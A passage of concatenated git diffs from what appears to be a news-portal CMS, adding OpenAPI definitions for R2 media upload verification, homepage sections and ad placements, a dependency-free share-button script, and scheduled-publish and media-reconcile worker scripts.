+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Upload session is not `pending_upload` (already uploaded/verified/attached/failed).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/media/news-images/upload-sessions/{id}/finalize:
+    post:
+      tags:
+        - News Media
+      summary: Finalize an upload session — real R2 GET + magic-byte MIME sniffing + server-side SHA-256 checksum (never a bare HEAD)
+      description: "Gated by news_portal.media.verify. High-risk, requires Idempotency-Key. Verifies the object actually uploaded to R2 (HEAD for existence/real size, then a full GET), sniffs the MIME type from the object's real magic bytes, and computes a SHA-256 checksum server-side. A client-claimed `checksumSha256` is only a transport-corruption cross-check, never a substitute for the MIME sniff — HEAD alone can never promote a media object to `verified`."
+      operationId: newsMediaUploadSessionsFinalize
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - name: Idempotency-Key
+          in: header
+          required: true
+          schema:
+            type: string
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: false
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/FinalizeNewsMediaUploadSessionRequest"
+      responses:
+        "200":
+          description: Object verified — media object status is now `verified` (or an idempotent replay).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/NewsMediaObjectItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "409":
+          description: Upload session is not `pending_upload`, has expired (`UPLOAD_SESSION_EXPIRED`), or the Idempotency-Key was reused with a different request (`IDEMPOTENCY_CONFLICT`).
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: "Uploaded object failed content verification (`UPLOAD_VERIFICATION_FAILED`). `error.details.reason` is one of `object_not_found`, `size_exceeded`, `mime_not_recognized`, `mime_not_allowed`, `mime_mismatch`, `checksum_mismatch`."
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "502":
+          description: Unable to verify the uploaded object right now (R2 provider error/circuit breaker open) — retry shortly.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/news-portal/homepage-sections:
+    get:
+      tags:
+        - News Portal Homepage Sections
+      summary: List this tenant's homepage sections (admin view)
+      description: Gated by news_portal.homepage_sections.read.
+      operationId: newsPortalHomepageSectionsList
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Homepage sections.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      sections:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/HomepageSectionItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - News Portal Homepage Sections
+      summary: Create a homepage section
+      description: Gated by news_portal.homepage_sections.configure. `config` is validated per `sectionType`; every referenced post/category/media object must already exist for this tenant (and gallery_block media must be a verified R2 media object).
+      operationId: newsPortalHomepageSectionsCreate
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/HomepageSectionCreateRequest"
+      responses:
+        "200":
+          description: Homepage section created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/HomepageSectionItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: sectionKey is already in use for this tenant.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+        "422":
+          description: config references content that does not exist, does not belong to this tenant, or (for gallery_block) is not a verified R2 media object.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/news-portal/homepage-sections/{id}:
+    patch:
+      tags:
+        - News Portal Homepage Sections
+      summary: Update a homepage section (title/config/sortOrder/isEnabled/schedule) — sectionType is immutable
+      description: Gated by news_portal.homepage_sections.configure.
+      operationId: newsPortalHomepageSectionsUpdate
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/HomepageSectionUpdateRequest"
+      responses:
+        "200":
+          description: Homepage section updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/HomepageSectionItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: config references content that does not exist, does not belong to this tenant, or (for gallery_block) is not a verified R2 media object.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - News Portal Homepage Sections
+      summary: Soft-delete a homepage section
+      description: Gated by news_portal.homepage_sections.configure.
+      operationId: newsPortalHomepageSectionsDelete
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - reason
+              properties:
+                reason:
+                  type: string
+      responses:
+        "200":
+          description: Homepage section deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      id:
+                        type: string
+                        format: uuid
+                      deleted:
+                        type: boolean
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/news-portal/ad-placements:
+    get:
+      tags:
+        - News Portal Ad Placements
+      summary: List this tenant's ad placements (admin view)
+      description: Gated by news_portal.ad_placements.read.
+      operationId: newsPortalAdPlacementsList
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Ad placements.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      placements:
+                        type: array
+                        items:
+                          $ref: "#/components/schemas/AdPlacementItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - News Portal Ad Placements
+      summary: Create an ad placement (R2-only image, verified media object required)
+      description: Gated by news_portal.ad_placements.configure. `mediaObjectId` must reference a verified (`verified`/`attached`) R2 media object for this tenant.
+      operationId: newsPortalAdPlacementsCreate
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/AdPlacementCreateRequest"
+      responses:
+        "200":
+          description: Ad placement created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/AdPlacementItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "422":
+          description: mediaObjectId does not exist, does not belong to this tenant, is not a verified R2 media object, or is not an allowed mime type for the target placement.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/news-portal/ad-placements/{id}:
+    patch:
+      tags:
+        - News Portal Ad Placements
+      summary: Update an ad placement (media reference/link/rotation/schedule/active)
+      description: Gated by news_portal.ad_placements.configure.
+      operationId: newsPortalAdPlacementsUpdate
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/AdPlacementUpdateRequest"
+      responses:
+        "200":
+          description: Ad placement updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/AdPlacementItem"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+        "422":
+          description: mediaObjectId does not exist, does not belong to this tenant, is not a verified R2 media object, or is not an allowed mime type for the target placement.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+    delete:
+      tags:
+        - News Portal Ad Placements
+      summary: Soft-delete an ad placement
+      description: Gated by news_portal.ad_placements.configure.
+      operationId: newsPortalAdPlacementsDelete
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required:
+                - reason
+              properties:
+                reason:
+                  type: string
+      responses:
+        "200":
+          description: Ad placement deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      id:
+                        type: string
+                        format: uuid
+                      deleted:
+                        type: boolean
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+components:
+  schemas:
+    CreateNewsMediaUploadSessionRequest:
+      type: object
+      required:
+        - mimeType
+        - byteSize
+      additionalProperties: false
+      properties:
+        mimeType:
+          type: string
+          description: "Must be one of the deployment's configured NEWS_MEDIA_R2_ALLOWED_MIME_TYPES (default: image/jpeg, image/png, image/webp, image/gif — image/svg+xml is never allowed by default)."
+          example: image/jpeg
+        byteSize:
+          type: integer
+          minimum: 1
+          description: Claimed size in bytes — shape-only check against NEWS_MEDIA_R2_MAX_UPLOAD_BYTES; the real size is re-checked from R2 itself at finalize time.
+        originalFilename:
+          type: string
+          nullable: true
+          description: Stored as display-only metadata — never part of the server-generated object key.
+        altText:
+          type: string
+          nullable: true
+        caption:
+          type: string
+          nullable: true
+    FinalizeNewsMediaUploadSessionRequest:
+      type: object
+      additionalProperties: false
+      properties:
+        checksumSha256:
+          type: string
+          nullable: true
+          description: Optional. When supplied, compared against the checksum computed server-side from the bytes actually read from R2 — a transport-corruption check only, never a substitute for the server-side MIME sniff.
+          pattern: ^[0-9a-fA-F]{64}$
+          example: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
+    NewsMediaObjectItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - objectKey
+        - publicUrl
+        - mimeType
+        - status
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        moduleKey:
+          type: string
+        ownerResourceType:
+          type: string
+          nullable: true
+          enum:
+            - blog_post
+            - blog_page
+            - homepage_section
+            - gallery_item
+            - ad
+            - video_thumbnail
+            - seo_image
+            - null
+        ownerResourceId:
+          type: string
+          format: uuid
+          nullable: true
+        storageDriver:
+          type: string
+          enum:
+            - cloudflare_r2
+        objectKey:
+          type: string
+        originalFilename:
+          type: string
+          nullable: true
+        publicUrl:
+          type: string
+          format: uri
+        mimeType:
+          type: string
+        sizeBytes:
+          type: integer
+          nullable: true
+        checksumSha256:
+          type: string
+          nullable: true
+        width:
+          type: integer
+          nullable: true
+        height:
+          type: integer
+          nullable: true
+        altText:
+          type: string
+          nullable: true
+        caption:
+          type: string
+          nullable: true
+        status:
+          type: string
+          enum:
+            - pending_upload
+            - uploaded
+            - verified
+            - attached
+            - orphaned
+            - deleted
+            - failed
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+    NewsMediaUploadSessionCreated:
+      type: object
+      required:
+        - objectId
+        - objectKey
+        - presignedUrl
+        - expiresAt
+      additionalProperties: false
+      properties:
+        objectId:
+          type: string
+          format: uuid
+        objectKey:
+          type: string
+          description: Server-generated — news-media/{tenantId}/{yyyy}/{mm}/{uuid}.{ext}. Never derived from client input.
+          example: news-media/3fa85f64-5717-4562-b3fc-2c963f66afa6/2026/07/1b9d6bcd-bbfd-4b2d-9b5d-ab8dfbbd4bed.jpg
+        presignedUrl:
+          type: string
+          format: uri
+          description: Short-lived presigned PUT URL scoped to exactly one object key. Never includes raw R2 credentials.
+        expiresAt:
+          type: string
+          format: date-time
+    HomepageSectionConfig:
+      description: "Shape depends on sectionType — headline: {postId}; latest_posts: {limit?, categorySlug?}; featured_posts/editor_picks: {postIds: []}; category_grid: {categorySlugs: [], postsPerCategory?}; gallery_block: {mediaObjectIds: [], caption?}. Validated server-side per sectionType; every id/slug must already exist for the same tenant, and gallery_block's mediaObjectIds must each be a verified R2 media object."
+      type: object
+      additionalProperties: true
+    HomepageSectionCreateRequest:
+      type: object
+      required:
+        - sectionKey
+        - sectionType
+        - config
+      properties:
+        sectionKey:
+          type: string
+          pattern: ^[a-z0-9][a-z0-9_-]{0,63}$
+        sectionType:
+          type: string
+          enum:
+            - headline
+            - latest_posts
+            - featured_posts
+            - editor_picks
+            - category_grid
+            - gallery_block
+        title:
+          type: string
+          nullable: true
+        config:
+          $ref: "#/components/schemas/HomepageSectionConfig"
+        sortOrder:
+          type: integer
+        isEnabled:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+    HomepageSectionItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - sectionKey
+        - sectionType
+        - config
+        - sortOrder
+        - isEnabled
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        sectionKey:
+          type: string
+        sectionType:
+          type: string
+          enum:
+            - headline
+            - latest_posts
+            - featured_posts
+            - editor_picks
+            - category_grid
+            - gallery_block
+        title:
+          type: string
+          nullable: true
+        config:
+          $ref: "#/components/schemas/HomepageSectionConfig"
+        sortOrder:
+          type: integer
+        isEnabled:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+    HomepageSectionUpdateRequest:
+      description: sectionType cannot be changed after creation — omit it, do not send the old or a new value.
+      type: object
+      properties:
+        title:
+          type: string
+          nullable: true
+        config:
+          $ref: "#/components/schemas/HomepageSectionConfig"
+        sortOrder:
+          type: integer
+        isEnabled:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+    AdPlacementItem:
+      type: object
+      required:
+        - id
+        - tenantId
+        - placementKey
+        - name
+        - mediaObjectId
+        - rotationMode
+        - priority
+        - isActive
+        - createdAt
+        - updatedAt
+      additionalProperties: false
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        placementKey:
+          type: string
+          enum:
+            - header_banner
+            - below_headline
+            - homepage_middle
+            - homepage_bottom
+            - article_top
+            - article_middle
+            - article_bottom
+            - sidebar_top
+            - sidebar_middle
+            - sidebar_bottom
+            - category_archive_top
+            - search_result_top
+        name:
+          type: string
+        mediaObjectId:
+          description: Must reference a verified (`verified`/`attached`) R2 media object belonging to this tenant (`awcms_news_media_objects`) — never a local path or arbitrary external URL.
+          type: string
+          format: uuid
+        linkUrl:
+          description: Optional, possibly external, link — validated server-side as an absolute http(s) URL only.
+          type: string
+          nullable: true
+        rotationMode:
+          type: string
+          enum:
+            - latest
+            - priority
+            - random_safe
+            - weighted
+        priority:
+          type: integer
+          minimum: 0
+        isActive:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+    AdPlacementCreateRequest:
+      type: object
+      required:
+        - placementKey
+        - name
+        - mediaObjectId
+      properties:
+        placementKey:
+          type: string
+          enum:
+            - header_banner
+            - below_headline
+            - homepage_middle
+            - homepage_bottom
+            - article_top
+            - article_middle
+            - article_bottom
+            - sidebar_top
+            - sidebar_middle
+            - sidebar_bottom
+            - category_archive_top
+            - search_result_top
+        name:
+          type: string
+        mediaObjectId:
+          type: string
+          format: uuid
+        linkUrl:
+          type: string
+          nullable: true
+        rotationMode:
+          type: string
+          enum:
+            - latest
+            - priority
+            - random_safe
+            - weighted
+          default: latest
+        priority:
+          type: integer
+          minimum: 0
+          default: 0
+        isActive:
+          type: boolean
+          default: true
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true
+    AdPlacementUpdateRequest:
+      type: object
+      properties:
+        placementKey:
+          type: string
+          enum:
+            - header_banner
+            - below_headline
+            - homepage_middle
+            - homepage_bottom
+            - article_top
+            - article_middle
+            - article_bottom
+            - sidebar_top
+            - sidebar_middle
+            - sidebar_bottom
+            - category_archive_top
+            - search_result_top
+        name:
+          type: string
+        mediaObjectId:
+          type: string
+          format: uuid
+        linkUrl:
+          type: string
+          nullable: true
+        rotationMode:
+          type: string
+          enum:
+            - latest
+            - priority
+            - random_safe
+            - weighted
+        priority:
+          type: integer
+          minimum: 0
+        isActive:
+          type: boolean
+        startsAt:
+          type: string
+          format: date-time
+          nullable: true
+        endsAt:
+          type: string
+          format: date-time
+          nullable: true

--- a/package.json
+++ b/package.json
@@ -41,6 +41,7 @@
     "sync:objects:dispatch": "bun scripts/object-sync-dispatch.ts",
     "workflow:escalations:dispatch": "bun scripts/workflow-escalations-dispatch.ts",
     "identity-access:business-scope:expiry": "bun scripts/identity-access-business-scope-expiry.ts",
+    "blog:publish:scheduled": "bun scripts/blog-scheduled-publish.ts",
     "logs:audit:purge": "bun scripts/audit-log-purge.ts",
     "email:dispatch": "bun scripts/email-dispatch.ts",
     "email:provider:health": "bun scripts/email-provider-health.ts",

--- a/package.json
+++ b/package.json
@@ -42,6 +42,7 @@
     "workflow:escalations:dispatch": "bun scripts/workflow-escalations-dispatch.ts",
     "identity-access:business-scope:expiry": "bun scripts/identity-access-business-scope-expiry.ts",
     "blog:publish:scheduled": "bun scripts/blog-scheduled-publish.ts",
+    "news-media:reconcile": "bun scripts/news-media-r2-reconcile.ts",
     "logs:audit:purge": "bun scripts/audit-log-purge.ts",
     "email:dispatch": "bun scripts/email-dispatch.ts",
     "email:provider:health": "bun scripts/email-provider-health.ts",

--- a/public/js/news-share.js
+++ b/public/js/news-share.js
@@ -1,0 +1,146 @@
+/**
+ * Public news article share widget progressive enhancement (Issue #642,
+ * epic `news_portal`). Loaded same-origin via `<script src="/js/news-share.js"
+ * defer>` by `src/modules/blog-content/domain/social-share-links.ts`'s
+ * `renderSocialShareButtonsHtml` — never inlined, so this file adds no
+ * Content-Security-Policy hash/nonce bookkeeping (plain `'self'` script-src
+ * already allows it, see `astro.config.mjs`).
+ *
+ * Deliberately vanilla, dependency-free, and does not fetch/import anything
+ * from a third-party origin — the whole point of this file is to satisfy
+ * the issue's "no third-party tracking JavaScript is loaded by default"
+ * requirement while still implementing the two share actions that
+ * structurally require client-side JS (native OS share sheet, clipboard
+ * copy). Every other share platform (WhatsApp/Telegram/Facebook/LinkedIn/
+ * X/email) is a plain server-rendered `<a href>` and needs no JS at all.
+ */
+(function () {
+  "use strict";
+
+  function showStatus(widget, message) {
+    var status = widget.querySelector(".js-news-share-status");
+
+    if (!status) {
+      return;
+    }
+
+    status.textContent = message;
+    status.hidden = false;
+  }
+
+  function findWidget(button) {
+    return button.closest(".news-share");
+  }
+
+  /**
+   * Native share button: stays `hidden` (server-rendered default) unless
+   * `navigator.share` really exists in a secure context — issue: "Native
+   * share uses `navigator.share` only after user activation and only in
+   * secure context." The button is only ever revealed here (feature
+   * detection); the actual `navigator.share(...)` call happens strictly
+   * inside the `click` handler below, i.e. only as the direct result of a
+   * real user activation, never on page load/automatically.
+   */
+  function enhanceNativeShareButtons() {
+    if (!window.isSecureContext || typeof navigator.share !== "function") {
+      return;
+    }
+
+    var buttons = document.querySelectorAll(".js-news-share-native");
+
+    buttons.forEach(function (button) {
+      button.hidden = false;
+
+      button.addEventListener("click", function () {
+        var shareData = {
+          url: button.getAttribute("data-share-url") || "",
+          title: button.getAttribute("data-share-title") || "",
+          text: button.getAttribute("data-share-text") || ""
+        };
+
+        navigator.share(shareData).catch(function (error) {
+          // AbortError = the visitor closed the native share sheet without
+          // picking a target — not a real failure, no status message.
+          if (error && error.name === "AbortError") {
+            return;
+          }
+
+          var widget = findWidget(button);
+
+          if (widget) {
+            showStatus(widget, "Unable to share right now.");
+          }
+        });
+      });
+    });
+  }
+
+  function fallbackCopyToClipboard(url) {
+    var textarea = document.createElement("textarea");
+    textarea.value = url;
+    textarea.setAttribute("readonly", "");
+    textarea.style.position = "fixed";
+    textarea.style.opacity = "0";
+    document.body.appendChild(textarea);
+    textarea.select();
+
+    var succeeded = false;
+
+    try {
+      succeeded = document.execCommand("copy");
+    } catch (error) {
+      succeeded = false;
+    }
+
+    document.body.removeChild(textarea);
+    return succeeded;
+  }
+
+  function enhanceCopyLinkButtons() {
+    var buttons = document.querySelectorAll(".js-news-share-copy");
+
+    buttons.forEach(function (button) {
+      button.addEventListener("click", function () {
+        var url = button.getAttribute("data-share-url") || "";
+        var widget = findWidget(button);
+
+        if (
+          window.isSecureContext &&
+          navigator.clipboard &&
+          typeof navigator.clipboard.writeText === "function"
+        ) {
+          navigator.clipboard
+            .writeText(url)
+            .then(function () {
+              if (widget) {
+                showStatus(widget, "Link copied.");
+              }
+            })
+            .catch(function () {
+              var succeeded = fallbackCopyToClipboard(url);
+
+              if (widget) {
+                showStatus(
+                  widget,
+                  succeeded ? "Link copied." : "Could not copy the link."
+                );
+              }
+            });
+          return;
+        }
+
+        var succeeded = fallbackCopyToClipboard(url);
+
+        if (widget) {
+          showStatus(
+            widget,
+            succeeded ? "Link copied." : "Could not copy the link."
+          );
+        }
+      });
+    });
+  }
+
+  enhanceNativeShareButtons();
+  enhanceCopyLinkButtons();
+})();

--- a/scripts/blog-scheduled-publish.ts
+++ b/scripts/blog-scheduled-publish.ts
@@ -37,7 +37,7 @@ import {
 } from "../src/lib/jobs/job-runner";
 import { fetchActiveTenants } from "../src/lib/jobs/batching";
 import { publishDueScheduledPosts } from "../src/modules/blog-content/application/blog-scheduled-publish";
-import { noopNewsMediaPortAdapter } from "../src/modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../src/modules/news-portal/application/news-media-port-adapter";
 import { noopSocialPublishingPortAdapter } from "../src/modules/blog-content/application/social-publishing-port-noop-adapter";
 
 async function main() {
@@ -78,7 +78,7 @@ async function main() {
             const tenantResult = await publishDueScheduledPosts(
               sql,
               tenant.id,
-              noopNewsMediaPortAdapter,
+              newsMediaPortAdapter,
               { now: new Date(), correlationId: ctx.correlationId },
               noopSocialPublishingPortAdapter
             );

--- a/scripts/blog-scheduled-publish.ts
+++ b/scripts/blog-scheduled-publish.ts
@@ -1,0 +1,128 @@
+/**
+ * blog-scheduled-publish.ts — `bun run blog:publish:scheduled`.
+ *
+ * Ported from awcms-mini (`scripts/blog-scheduled-publish.ts`). Internal
+ * worker entrypoint, not exposed over HTTP, run on a schedule (cron/systemd
+ * timer). Publishes every due `status = 'scheduled'` post
+ * (`scheduled_at <= now()`) for every active tenant via
+ * `publishDueScheduledPosts`. Idempotent: a post already published, still in
+ * the future, or left `scheduled` after a blocked checklist attempt simply
+ * doesn't get re-published on a re-run.
+ *
+ * Built on the shared worker runner (`../src/lib/jobs/job-runner.ts` —
+ * advisory lock, timeout, SIGTERM/SIGINT-aware cancellation, JSON
+ * telemetry), the current convention for a NEW job in this base (mini's own
+ * script predates that runner and used a hand-rolled try/catch loop).
+ *
+ * This script is the composition root (ADR-0011) that would wire
+ * `news_portal`'s `NewsMediaPort`/`social_publishing`'s
+ * `SocialPublishingPort` implementations into `blog_content`'s scheduled-
+ * publish job. Neither module is ported to this base yet, so this script
+ * injects `blog_content`'s own no-op adapters instead — see
+ * `news-media-port-noop-adapter.ts`/`social-publishing-port-noop-
+ * adapter.ts`'s own headers. `blog-scheduled-publish.ts` (the
+ * application-layer file) itself never imports either adapter directly,
+ * only the port TYPES — this script is the only place that changes once
+ * those modules are ported.
+ */
+import { getWorkerDatabaseClient } from "../src/lib/database/client";
+import {
+  applyJobExitCode,
+  formatJobOutcomeLine,
+  isJobResultOk,
+  parseJobCliArgs,
+  printJobTelemetry,
+  runJob,
+  writeJobTelemetry
+} from "../src/lib/jobs/job-runner";
+import { fetchActiveTenants } from "../src/lib/jobs/batching";
+import { publishDueScheduledPosts } from "../src/modules/blog-content/application/blog-scheduled-publish";
+import { noopNewsMediaPortAdapter } from "../src/modules/blog-content/application/news-media-port-noop-adapter";
+import { noopSocialPublishingPortAdapter } from "../src/modules/blog-content/application/social-publishing-port-noop-adapter";
+
+async function main() {
+  const sql = getWorkerDatabaseClient();
+  const cliOptions = parseJobCliArgs(process.argv.slice(2));
+
+  try {
+    const result = await runJob(
+      {
+        name: "blog:publish:scheduled",
+        description:
+          "Publishes every due status='scheduled' blog post (scheduled_at <= now()) for every active tenant, gated by the content quality checklist.",
+        handler: async (ctx) => {
+          if (ctx.dryRun) {
+            const tenants = await fetchActiveTenants(sql);
+            return {
+              status: "success" as const,
+              itemCounts: {
+                tenantsChecked: tenants.length,
+                published: 0,
+                blocked: 0,
+                partialTenants: 0
+              },
+              detail: "dry-run: no post was published or blocked."
+            };
+          }
+
+          const tenants = await fetchActiveTenants(sql);
+          let totalPublished = 0;
+          let totalBlocked = 0;
+          let partialTenants = 0;
+
+          for (const tenant of tenants) {
+            if (ctx.signal.aborted) {
+              break;
+            }
+
+            const tenantResult = await publishDueScheduledPosts(
+              sql,
+              tenant.id,
+              noopNewsMediaPortAdapter,
+              { now: new Date(), correlationId: ctx.correlationId },
+              noopSocialPublishingPortAdapter
+            );
+
+            totalPublished += tenantResult.publishedCount;
+            totalBlocked += tenantResult.blockedCount;
+            if (tenantResult.partial) {
+              // This tenant had a full batch this run; its remaining due
+              // posts are picked up on the next scheduled run (idempotent).
+              partialTenants += 1;
+            }
+          }
+
+          return {
+            status: partialTenants > 0 ? "partial" : "success",
+            itemCounts: {
+              tenantsChecked: tenants.length,
+              published: totalPublished,
+              blocked: totalBlocked,
+              partialTenants
+            },
+            detail:
+              partialTenants > 0
+                ? `${partialTenants} tenant(s) still had a due-post backlog remaining after this run's batch bound.`
+                : undefined
+          };
+        }
+      },
+      { sql, dryRun: cliOptions.dryRun }
+    );
+
+    printJobTelemetry(result);
+    await writeJobTelemetry(result, cliOptions.jsonOutputPath);
+
+    if (!isJobResultOk(result)) {
+      console.error(formatJobOutcomeLine(result));
+    }
+
+    applyJobExitCode(result);
+  } finally {
+    await sql.close({ timeout: 1 });
+  }
+}
+
+if (import.meta.main) {
+  await main();
+}

--- a/scripts/news-media-r2-reconcile.ts
+++ b/scripts/news-media-r2-reconcile.ts
@@ -1,0 +1,169 @@
+/**
+ * news-media-r2-reconcile.ts — `bun run news-media:reconcile`.
+ *
+ * Issue #690 (epic #679, platform-hardening — "runtime/worker hardening"
+ * wave, following #691/#689/#694/#695/#687/#697). Pending/orphan R2 media
+ * lifecycle cleanup and DB-vs-R2 reconciliation for the news-portal
+ * full-online R2-only media registry (`awcms_news_media_objects`,
+ * `sql/041_awcms_news_media_object_registry_schema.sql`). Ported from
+ * awcms-mini (`scripts/news-media-r2-reconcile.ts`).
+ *
+ * Built on the shared worker runner (`src/lib/jobs/job-runner.ts`, Issue
+ * #697) from day one — this is a NEW job, not a migration of an existing
+ * script, so there is no "before" behavior to preserve; every concern
+ * (advisory lock, timeout, correlation id, exit code, JSON telemetry) comes
+ * straight from `runJob`, same as `logs:audit:purge`/`modules:sync` (the two
+ * jobs #697 already migrated).
+ *
+ * ## Feature gate — this entire job is a no-op unless R2-only news media is enabled
+ *
+ * `NEWS_MEDIA_R2_ENABLED` (`news-media-r2-config.ts`) is the SAME master
+ * switch the upload/finalize endpoints already gate on. When it is not
+ * `"true"`, this job returns `status: "skipped"` immediately (before
+ * acquiring the advisory lock or touching R2/DB) — safe to schedule
+ * unconditionally on every deployment profile, including offline/LAN ones
+ * where R2-only news media is never enabled at all.
+ *
+ * ## No local filesystem fallback, no binary payload in Postgres
+ *
+ * This job only ever talks to Cloudflare R2 (via `NewsMediaR2Client`, Bun's
+ * native `Bun.S3Client`) and to `awcms_news_media_objects` metadata —
+ * it never reads/writes a local file, and never stores object bytes
+ * anywhere (this table has no binary column and never will,
